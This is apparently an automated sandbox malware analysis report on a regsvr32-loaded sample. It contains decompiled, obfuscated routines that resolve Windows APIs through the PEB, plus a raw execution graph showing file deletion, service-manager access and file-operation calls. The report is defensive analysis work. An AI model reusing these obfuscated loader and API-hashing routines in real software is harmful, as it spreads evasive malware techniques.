                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				unsigned int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t44;
                                                                                                                				void* _t55;
                                                                                                                				signed int _t57;
                                                                                                                				void* _t62;
                                                                                                                				long _t63;
                                                                                                                
                                                                                                                				_push(_a16);
                                                                                                                				_t62 = __edx;
                                                                                                                				_t63 = __ecx;
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E00289E7D(_t44);
                                                                                                                				_v12 = 0x22ab7;
                                                                                                                				_t57 = 0x25;
                                                                                                                				_v12 = _v12 * 0x37;
                                                                                                                				_v12 = _v12 / _t57;
                                                                                                                				_v12 = _v12 + 0xd1d9;
                                                                                                                				_v12 = _v12 ^ 0x00090b04;
                                                                                                                				_v16 = 0xc8cc57;
                                                                                                                				_v16 = _v16 >> 0x10;
                                                                                                                				_v16 = _v16 + 0xffff2520;
                                                                                                                				_v16 = _v16 ^ 0xfffe92e9;
                                                                                                                				_v20 = 0xc52a4b;
                                                                                                                				_v20 = _v20 | 0xae757bf4;
                                                                                                                				_v20 = _v20 ^ 0xaef18991;
                                                                                                                				_v8 = 0xf15120;
                                                                                                                				_v8 = _v8 ^ 0xeebb54a4;
                                                                                                                				_v8 = _v8 << 7;
                                                                                                                				_v8 = _v8 * 0x37;
                                                                                                                				_v8 = _v8 ^ 0xf39e7cda;
                                                                                                                				E0029BFF0(0xac802c42, 0xa7, _t57, _t57, 0x96a08a4a);
                                                                                                                				_t55 = RtlAllocateHeap(_t62, _t63, _a8); // executed
                                                                                                                				return _t55;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,005D2A08,FFFE92E9,?,?,?,?,?,?,?,?,00E39F9A,?), ref: 00291BE5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
                                                                                                                • Instruction ID: 09ebfe7314d2d8204020d61ddbba39493043075168e15297450f077313076f27
                                                                                                                • Opcode Fuzzy Hash: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
                                                                                                                • Instruction Fuzzy Hash: 7D2163B5C00208FBCF05DFA4C94A8EEBFB4FB80314F108089E810A6261D3B45B51DF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E002966C2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t39;
                                                                                                                				intOrPtr* _t45;
                                                                                                                				void* _t46;
                                                                                                                				void* _t51;
                                                                                                                
                                                                                                                				_t51 = __edx;
                                                                                                                				E00289E7D(_t39);
                                                                                                                				_v12 = 0xe2acc8;
                                                                                                                				_v12 = _v12 >> 3;
                                                                                                                				_v12 = _v12 + 0xbe17;
                                                                                                                				_v12 = _v12 ^ 0x0011993b;
                                                                                                                				_v20 = 0xf2f568;
                                                                                                                				_v20 = _v20 << 0xe;
                                                                                                                				_v20 = _v20 ^ 0xbd5142c5;
                                                                                                                				_v8 = 0x6d1128;
                                                                                                                				_v8 = _v8 + 0xffff2279;
                                                                                                                				_v8 = _v8 << 3;
                                                                                                                				_v8 = _v8 << 0xc;
                                                                                                                				_v8 = _v8 ^ 0x19de445b;
                                                                                                                				_v16 = 0xb26540;
                                                                                                                				_v16 = _v16 + 0xffff3889;
                                                                                                                				_v16 = _v16 ^ 0x00b459c6;
                                                                                                                				_t45 = E0029BFF0(0xee7aaf55, 0x326, __ecx, __ecx, 0x1d46c800);
                                                                                                                				_t46 =  *_t45(0, _a20, 0, _a8, _t51, __ecx, __edx, _a4, _a8, 0, 0, _a20, _a24, _a28, _a32); // executed
                                                                                                                				return _t46;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,060C7659,00000000,00B459C6,?), ref: 00296777
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
                                                                                                                • Instruction ID: c93244d2a0459081b3655f8575f455805b71dd93837220ff5d17d38fea2e9722
                                                                                                                • Opcode Fuzzy Hash: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
                                                                                                                • Instruction Fuzzy Hash: FD1144B2800208FBCF15DF95CC0A8DEBFB4EF85704F108198F92962210D3B18A64DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E0028FCB5(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t36;
                                                                                                                				struct HINSTANCE__* _t47;
                                                                                                                				signed int _t49;
                                                                                                                				signed int _t50;
                                                                                                                				WCHAR* _t57;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				_t57 = __edx;
                                                                                                                				_push(__edx);
                                                                                                                				E00289E7D(_t36);
                                                                                                                				_v20 = 0x4781cd;
                                                                                                                				_t49 = 7;
                                                                                                                				_v20 = _v20 / _t49;
                                                                                                                				_v20 = _v20 ^ 0x0004a997;
                                                                                                                				_v8 = 0x9f6121;
                                                                                                                				_v8 = _v8 | 0x04abbfea;
                                                                                                                				_v8 = _v8 ^ 0x44133d53;
                                                                                                                				_v8 = _v8 ^ 0x40a32c45;
                                                                                                                				_v16 = 0x791f5b;
                                                                                                                				_t50 = 0x6e;
                                                                                                                				_v16 = _v16 / _t50;
                                                                                                                				_v16 = _v16 ^ 0x000d135a;
                                                                                                                				_v12 = 0x90c5d0;
                                                                                                                				_v12 = _v12 ^ 0x2cafc93f;
                                                                                                                				_v12 = _v12 ^ 0x2c381e09;
                                                                                                                				E0029BFF0(0xac802c42, 0x347, _t50, _t50, 0xede26741);
                                                                                                                				_t47 = LoadLibraryW(_t57); // executed
                                                                                                                				return _t47;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 0028FD58
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E00289EA8(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t35;
                                                                                                                				int _t42;
                                                                                                                				WCHAR* _t46;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t46 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E00289E7D(_t35);
                                                                                                                				_v20 = 0xb0cce;
                                                                                                                				_v20 = _v20 + 0xffff00ee;
                                                                                                                				_v20 = _v20 ^ 0x0007bd05;
                                                                                                                				_v12 = 0x1e8fca;
                                                                                                                				_v12 = _v12 >> 6;
                                                                                                                				_v12 = _v12 << 8;
                                                                                                                				_v12 = _v12 + 0xffff1da9;
                                                                                                                				_v12 = _v12 ^ 0x0077171f;
                                                                                                                				_v16 = 0xc679b7;
                                                                                                                				_v16 = _v16 + 0x38bf;
                                                                                                                				_v16 = _v16 ^ 0x00cf762a;
                                                                                                                				_v8 = 0xa3ba51;
                                                                                                                				_v8 = _v8 ^ 0xa0d3ead1;
                                                                                                                				_v8 = _v8 + 0xe688;
                                                                                                                				_v8 = _v8 + 0xffff6d73;
                                                                                                                				_v8 = _v8 ^ 0xa079263d;
                                                                                                                				E0029BFF0(0xac802c42, 0x385, __ecx, __ecx, 0x77e9f533);
                                                                                                                				_t42 = DeleteFileW(_t46); // executed
                                                                                                                				return _t42;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00E39F9E,00000000), ref: 00289F51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 4033686569-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E0028BA9C(int _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				unsigned int _v20;
                                                                                                                				void* _t34;
                                                                                                                
                                                                                                                				_v20 = 0x6b4597;
                                                                                                                				_v20 = _v20 >> 2;
                                                                                                                				_v20 = _v20 ^ 0x00116e69;
                                                                                                                				_v16 = 0x7d3df7;
                                                                                                                				_v16 = _v16 << 3;
                                                                                                                				_v16 = _v16 ^ 0x03ee9fa4;
                                                                                                                				_v12 = 0x7e0c35;
                                                                                                                				_v12 = _v12 ^ 0xa2581e84;
                                                                                                                				_v12 = _v12 ^ 0xa22bc007;
                                                                                                                				_v8 = 0xada9ee;
                                                                                                                				_push(_t34);
                                                                                                                				_v8 = _v8 * 0x61;
                                                                                                                				_v8 = _v8 << 0xb;
                                                                                                                				_v8 = _v8 ^ 0x6b103fde;
                                                                                                                				E0029BFF0(0xac802c42, 0x166, _t34, _t34, 0x80a33dd2);
                                                                                                                				ExitProcess(_a12);
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00116E69), ref: 0028BB1D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 621844428-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0029AA52() {
                                                                                                                
                                                                                                                				return  *[fs:0x30];
                                                                                                                			}




                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.449718656.0000000000280000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000004.00000002.449926106.00000000002A4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_280000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:16.7%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:1056
                                                                                                                Total number of Limit Nodes:17
98ced8 4059->4857 4865 9a13fd 4059->4865 4873 99692b 4059->4873 4065->3871 4066->4059 4070 98588d GetPEB 4069->4070 4071 98313a 4070->4071 5006 99da13 4071->5006 4075 99c3a6 4074->4075 4076 986a8d GetPEB 4075->4076 4078 99c516 4075->4078 4082 99c514 4075->4082 5010 995cb1 4075->5010 5014 990097 4075->5014 5019 98f605 4075->5019 5023 98e2b2 4075->5023 4076->4075 5026 98f9a7 4078->5026 4082->3871 4087 985aa2 4084->4087 4086 985b7d 4086->3871 4087->4086 5030 995c05 4087->5030 5034 98e0eb 4087->5034 4092 98c7eb 4089->4092 4090 984bb4 RtlAllocateHeap GetPEB 4090->4092 4091 9966c2 2 API calls 4091->4092 4092->4090 4092->4091 4093 98ce91 4092->4093 4095 98c453 GetPEB 4092->4095 4096 98ce8f 4092->4096 4097 98b9d7 GetPEB 4092->4097 4098 991bed GetPEB 4092->4098 4094 9963f0 3 API calls 4093->4094 4094->4096 4095->4092 4096->3861 4097->4092 4098->4092 4101 988fba 4099->4101 4100 984bb4 2 API calls 4100->4101 4101->4100 4103 99734a GetPEB 4101->4103 4105 9890e2 4101->4105 4106 98b9d7 GetPEB 4101->4106 4108 9a110e 2 API calls 4101->4108 4109 98b4fc 4 API calls 4101->4109 4111 9890e0 4101->4111 5038 98d899 4101->5038 5045 989133 4101->5045 4103->4101 4107 98ffde GetPEB 4105->4107 4106->4101 4110 9890fb 4107->4110 4108->4101 4109->4101 5054 98f6cf 4110->5054 4111->3861 4114 99a9a1 4113->4114 4140 99bff0 4114->4140 4118 9966e9 4117->4118 4119 99bff0 GetPEB 4118->4119 4120 99676b SHGetFolderPathW 4119->4120 4120->3891 4122 9832cd 4121->4122 4123 99bff0 GetPEB 4122->4123 4124 98337c OpenSCManagerW 4123->4124 4124->3891 4130 984fae 4125->4130 4128 989574 GetPEB 4128->4130 4129 985080 4129->3891 4130->4128 4130->4129 4170 99ade9 4130->4170 4174 9a07bb 4130->4174 4178 98645e 4131->4178 4135 99eb9a 4135->3891 4137 98958e 4136->4137 4185 989aac 4137->4185 4141 99aa46 CloseServiceHandle 4140->4141 4142 99c0a6 4140->4142 4141->3891 4146 9a1ae9 4142->4146 4144 99c0ba 4149 99b558 4144->4149 4153 99aa52 GetPEB 4146->4153 4148 9a1b98 4148->4144 4151 99b575 4149->4151 4150 99b64f 4150->4141 
4151->4150 4154 99b384 4151->4154 4153->4148 4155 99b4de 4154->4155 4162 99e545 4155->4162 4158 99b520 4160 99b54f 4158->4160 4161 99b558 GetPEB 4158->4161 4160->4150 4161->4160 4163 99e558 4162->4163 4164 99bff0 GetPEB 4163->4164 4165 99b506 4164->4165 4165->4158 4166 99e9a4 4165->4166 4167 99e9b4 4166->4167 4168 99bff0 GetPEB 4167->4168 4169 99ea43 4168->4169 4169->4158 4171 99ae00 4170->4171 4172 99bff0 GetPEB 4171->4172 4173 99aea1 4172->4173 4173->4130 4175 9a07d1 4174->4175 4176 99bff0 GetPEB 4175->4176 4177 9a0861 4176->4177 4177->4130 4179 99bff0 GetPEB 4178->4179 4180 9864fc 4179->4180 4181 991b22 4180->4181 4182 991b41 4181->4182 4183 99bff0 GetPEB 4182->4183 4184 991bdd RtlAllocateHeap 4183->4184 4184->4135 4186 989ace 4185->4186 4187 99bff0 GetPEB 4186->4187 4188 989601 4187->4188 4188->3892 4190 984bce 4189->4190 4191 99eaa3 2 API calls 4190->4191 4192 984c3e 4191->4192 4192->3903 4192->4192 4194 98d6aa 4193->4194 4195 99bff0 GetPEB 4194->4195 4196 98d746 4195->4196 4196->3903 4198 98c728 4197->4198 4199 99bff0 GetPEB 4198->4199 4200 98c7bd 4199->4200 4200->3903 4202 98d5e4 4201->4202 4203 99bff0 GetPEB 4202->4203 4204 98d67d 4203->4204 4204->3912 4206 98b9e9 4205->4206 4207 986a8d GetPEB 4206->4207 4208 98ba1e 4207->4208 4208->3903 4210 986a9d 4209->4210 4211 98645e GetPEB 4210->4211 4212 986bbb 4211->4212 4215 9950b6 4212->4215 4216 9950d5 4215->4216 4217 99bff0 GetPEB 4216->4217 4218 986bd4 4217->4218 4218->3910 4220 98c507 4219->4220 4221 99bff0 GetPEB 4220->4221 4222 98c5b2 OpenServiceW 4221->4222 4222->3915 4224 991089 4223->4224 4225 99bff0 GetPEB 4224->4225 4226 991122 4225->4226 4226->3915 4228 98d35d 4227->4228 4229 984bb4 2 API calls 4228->4229 4230 98d4ea 4229->4230 4255 98fd5f 4230->4255 4233 98b9d7 GetPEB 4234 98d516 4233->4234 4259 989ea8 4234->4259 4236 98d52a 4236->3922 4238 9a1128 4237->4238 4266 98b184 4238->4266 4241 98b184 GetPEB 4242 9a1378 4241->4242 4243 98b184 GetPEB 4242->4243 4244 9a138d 4243->4244 4245 9a07bb GetPEB 
4244->4245 4246 9a13a2 4245->4246 4247 9a07bb GetPEB 4246->4247 4248 9a13ba 4247->4248 4270 98338b 4248->4270 4250 9a13f0 4250->3928 4252 99736f 4251->4252 4253 98f56b GetPEB 4252->4253 4254 99738c 4253->4254 4254->3928 4256 98fd7b 4255->4256 4263 98f56b 4256->4263 4260 989ebe 4259->4260 4261 99bff0 GetPEB 4260->4261 4262 989f4d DeleteFileW 4261->4262 4262->4236 4264 99bff0 GetPEB 4263->4264 4265 98d507 4264->4265 4265->4233 4267 98b19a 4266->4267 4274 99c0df 4267->4274 4271 98339b 4270->4271 4272 99bff0 GetPEB 4271->4272 4273 983449 SHFileOperationW 4272->4273 4273->4250 4275 99c0fa 4274->4275 4278 99e0ca 4275->4278 4279 99e0e7 4278->4279 4280 99bff0 GetPEB 4279->4280 4281 98b1f9 4280->4281 4281->4241 4283 99bff0 GetPEB 4282->4283 4284 985939 4283->4284 4284->3932 4286 99bff0 GetPEB 4285->4286 4287 98f361 4286->4287 4287->3932 4289 991c12 4288->4289 4290 98f56b GetPEB 4289->4290 4291 991c34 4290->4291 4291->3932 4293 98f1fa 4292->4293 4294 99bff0 GetPEB 4293->4294 4295 98f2a8 SetFileInformationByHandle 4294->4295 4295->3947 4297 99bf49 4296->4297 4298 99bff0 GetPEB 4297->4298 4299 99bfd6 CreateFileW 4298->4299 4299->3947 4301 99e389 4300->4301 4302 99bff0 GetPEB 4301->4302 4303 99e42b CloseHandle 4302->4303 4303->3949 4305 99190a 4304->4305 4306 99bff0 GetPEB 4305->4306 4307 991999 4306->4307 4307->3947 4309 99ba53 4308->4309 4310 99bff0 GetPEB 4309->4310 4311 99bae0 4310->4311 4311->3955 4319 983537 4312->4319 4313 99eaa3 RtlAllocateHeap GetPEB 4313->4319 4314 983c34 4315 986a8d GetPEB 4314->4315 4317 983c45 4315->4317 4317->3970 4318 986a8d GetPEB 4318->4319 4319->4313 4319->4314 4319->4317 4319->4318 4321 99a98e 2 API calls 4319->4321 4322 98c4eb 2 API calls 4319->4322 4324 98f2b9 GetPEB 4319->4324 4329 99b14e 4319->4329 4333 9913d4 4319->4333 4337 99a3e6 4319->4337 4321->4319 4322->4319 4324->4319 4326 98411c 4325->4326 4327 99bff0 GetPEB 4326->4327 4328 98419f 4327->4328 4328->3970 4330 99b16a 4329->4330 4331 99bff0 GetPEB 4330->4331 4332 99b205 4331->4332 
4332->4319 4334 99140f 4333->4334 4335 99bff0 GetPEB 4334->4335 4336 9914bb 4335->4336 4336->4319 4338 99a415 4337->4338 4339 99bff0 GetPEB 4338->4339 4340 99a4a0 4339->4340 4340->4319 4342 984640 4341->4342 4345 991d1c 4342->4345 4346 991d3a 4345->4346 4349 982fe6 4346->4349 4350 983002 4349->4350 4351 99bff0 GetPEB 4350->4351 4352 9830ae 4351->4352 4352->3983 4354 98fff1 4353->4354 4355 99bff0 GetPEB 4354->4355 4356 99008b 4355->4356 4356->3994 4363 995d94 4357->4363 4358 9963d3 4377 98428c 4358->4377 4360 9963d1 4360->3994 4361 984bb4 RtlAllocateHeap GetPEB 4361->4363 4363->4358 4363->4360 4363->4361 4365 99734a GetPEB 4363->4365 4366 995d68 2 API calls 4363->4366 4367 98fd5f GetPEB 4363->4367 4368 98b9d7 GetPEB 4363->4368 4369 98fa6c 4363->4369 4373 98fe4b 4363->4373 4365->4363 4366->4363 4367->4363 4368->4363 4370 98fa85 4369->4370 4371 99bff0 GetPEB 4370->4371 4372 98fb15 4371->4372 4372->4363 4374 98fe5e 4373->4374 4375 99bff0 GetPEB 4374->4375 4376 98fef3 4375->4376 4376->4363 4378 9842a5 4377->4378 4379 99bff0 GetPEB 4378->4379 4380 984337 4379->4380 4380->4360 4382 98c635 4381->4382 4384 98c61f 4381->4384 4382->4004 4383 986a8d GetPEB 4383->4384 4384->4382 4384->4383 4386 995047 4385->4386 4399 990b4c 4386->4399 4393 9a252f 4389->4393 4390 9a2704 4390->4004 4391 984bb4 2 API calls 4391->4393 4392 9a26f3 4394 986a8d GetPEB 4392->4394 4393->4390 4393->4391 4393->4392 4396 99eaa3 2 API calls 4393->4396 4397 98b9d7 GetPEB 4393->4397 4501 99acff 4393->4501 4505 98c453 4393->4505 4394->4390 4396->4393 4397->4393 4404 990b68 4399->4404 4402 990c59 4403 986a8d GetPEB 4402->4403 4406 990c57 4403->4406 4404->4402 4405 99eaa3 2 API calls 4404->4405 4404->4406 4408 987786 4404->4408 4425 98508b 4404->4425 4434 983210 4404->4434 4405->4404 4406->4004 4421 98842c 4408->4421 4409 9888b0 4410 98d5cb GetPEB 4409->4410 4411 9888ae 4410->4411 4411->4404 4413 98f36a GetPEB 4413->4421 4418 984bb4 RtlAllocateHeap GetPEB 4418->4421 4421->4409 4421->4411 4421->4413 4421->4418 
4422 98d68b GetPEB 4421->4422 4423 991d1c GetPEB 4421->4423 4424 98b9d7 GetPEB 4421->4424 4439 989f58 4421->4439 4443 98bd30 4421->4443 4447 98b40a 4421->4447 4451 98fd9d 4421->4451 4455 997473 4421->4455 4481 984d7d 4421->4481 4485 99677f 4421->4485 4422->4421 4423->4421 4424->4421 4430 9855c3 4425->4430 4426 98575b 4426->4404 4427 984bb4 RtlAllocateHeap GetPEB 4427->4430 4428 98575d 4429 98d5cb GetPEB 4428->4429 4429->4426 4430->4426 4430->4427 4430->4428 4431 98b40a GetPEB 4430->4431 4432 98d68b GetPEB 4430->4432 4433 98b9d7 GetPEB 4430->4433 4431->4430 4432->4430 4433->4430 4435 99677f GetPEB 4434->4435 4436 98329c 4435->4436 4437 986a8d GetPEB 4436->4437 4438 9832af 4437->4438 4438->4404 4440 989f7a 4439->4440 4441 99bff0 GetPEB 4440->4441 4442 98a009 4441->4442 4442->4421 4444 98bd52 4443->4444 4445 99bff0 GetPEB 4444->4445 4446 98bdf5 4445->4446 4446->4421 4448 98b43a 4447->4448 4449 99bff0 GetPEB 4448->4449 4450 98b4e0 4449->4450 4450->4421 4452 98fdb3 4451->4452 4453 99bff0 GetPEB 4452->4453 4454 98fe3d 4453->4454 4454->4421 4473 998307 4455->4473 4456 984bb4 RtlAllocateHeap GetPEB 4456->4473 4457 98d5cb GetPEB 4457->4473 4458 984bb4 RtlAllocateHeap GetPEB 4476 9986af 4458->4476 4459 998558 4464 984bb4 2 API calls 4459->4464 4460 986a8d GetPEB 4460->4473 4462 9987d6 4462->4421 4463 99eaa3 2 API calls 4463->4473 4465 998578 4464->4465 4466 984bb4 2 API calls 4465->4466 4468 99859a 4466->4468 4467 98d68b GetPEB 4467->4476 4469 99ade9 GetPEB 4468->4469 4471 9985c6 4469->4471 4497 99cfc3 4471->4497 4473->4456 4473->4457 4473->4459 4473->4460 4473->4462 4473->4463 4473->4476 4478 98b9d7 GetPEB 4473->4478 4489 988ab6 4473->4489 4493 9865d5 4473->4493 4474 98b9d7 GetPEB 4474->4476 4476->4458 4476->4467 4476->4474 4477 98b9d7 GetPEB 4479 998697 4477->4479 4478->4473 4480 98b9d7 GetPEB 4479->4480 4480->4476 4482 984dad 4481->4482 4483 99bff0 GetPEB 4482->4483 4484 984e5c 4483->4484 4484->4421 4486 996792 4485->4486 4487 99bff0 GetPEB 4486->4487 4488 996834 
4487->4488 4488->4421 4490 988af6 4489->4490 4491 99bff0 GetPEB 4490->4491 4492 988baa 4491->4492 4492->4473 4494 986602 4493->4494 4495 99bff0 GetPEB 4494->4495 4496 986697 4495->4496 4496->4473 4498 99cff4 4497->4498 4499 99bff0 GetPEB 4498->4499 4500 998667 4499->4500 4500->4477 4502 99ad1f 4501->4502 4503 99eaa3 2 API calls 4502->4503 4504 99ad9c 4503->4504 4504->4393 4504->4504 4506 98c481 4505->4506 4507 98f56b GetPEB 4506->4507 4508 98c4a8 4507->4508 4508->4393 4510 9a0343 4509->4510 4511 99bff0 GetPEB 4510->4511 4512 9a03e4 4511->4512 4512->4013 4514 99aa83 4513->4514 4515 99bff0 GetPEB 4514->4515 4516 99ab22 4515->4516 4516->4013 4528 993cdd 4517->4528 4521 990c9d 4520->4521 4551 98f43b 4521->4551 4524 990e00 4524->4020 4527 99e373 2 API calls 4527->4524 4531 993d02 4528->4531 4534 98ba93 4531->4534 4535 993f17 4531->4535 4537 985942 4531->4537 4540 991a72 4531->4540 4544 99efa0 4531->4544 4548 98b34c 4531->4548 4534->4020 4536 99e373 2 API calls 4535->4536 4536->4534 4538 98588d GetPEB 4537->4538 4539 98597a 4538->4539 4539->4531 4541 991a88 4540->4541 4542 99bff0 GetPEB 4541->4542 4543 991b14 4542->4543 4543->4531 4545 99efb9 4544->4545 4546 99bff0 GetPEB 4545->4546 4547 99f052 4546->4547 4547->4531 4549 99bff0 GetPEB 4548->4549 4550 98b3f2 4549->4550 4550->4531 4552 99bff0 GetPEB 4551->4552 4553 98f4f2 4552->4553 4553->4524 4554 9914da 4553->4554 4555 9914f9 4554->4555 4556 99bff0 GetPEB 4555->4556 4557 990dee 4556->4557 4557->4527 4559 983f42 4558->4559 4560 99bff0 GetPEB 4559->4560 4561 983ff1 4560->4561 4561->4034 4563 9a1cd8 4562->4563 4564 99bff0 GetPEB 4563->4564 4565 9a1d53 4564->4565 4565->4034 4567 983169 4566->4567 4568 99bff0 GetPEB 4567->4568 4569 983203 4568->4569 4569->4034 4585 98a07f 4570->4585 4572 995b4c GetPEB 4572->4585 4573 98b074 4667 995b4c 4573->4667 4575 984bb4 2 API calls 4575->4585 4577 98b08a 4577->4043 4582 98b9d7 GetPEB 4582->4585 4583 986a8d GetPEB 4583->4585 4585->4572 4585->4573 4585->4575 4585->4577 4585->4582 
